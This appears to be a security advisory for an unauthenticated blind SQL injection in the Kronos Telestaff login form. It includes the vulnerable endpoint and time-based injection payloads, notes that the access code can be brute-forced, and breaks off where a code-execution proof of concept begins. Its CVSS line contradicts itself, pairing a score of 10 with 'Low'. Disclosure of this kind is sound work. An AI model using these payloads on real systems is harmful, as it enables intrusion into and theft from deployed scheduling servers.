Software: Kronos Telestaff Web Application Version: < 2.92EU29 Homepage: http://www.kronos.com/ CERT VU: VU#958480 CVE: (Pending) CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C) CWE: CWE-89 Vulnerable Component: Login page Description ================ The login form is vulnerable to blind SQL injection by an unauthenticated user. Vulnerabilities ================ The vulnerability is due to the unsanitized POST parameter 'user' in login page: URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code= The exploit requires a valid "code" in the post body. However in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page. Furthermore, the "code" POST variable is very often a 4 digit number - and can be easily discovered in ~5000 requests. Proof of concept ================ PoC 1 - extract data from database example extract benign data e.g. Injection Point: [BASE URL OF Telestaff Application]/servlet/ServletController.asp POST data: device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code= compare timing with device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code= PoC 2 - Execute Code Remotely example inject benign code e.g. ping a remote systems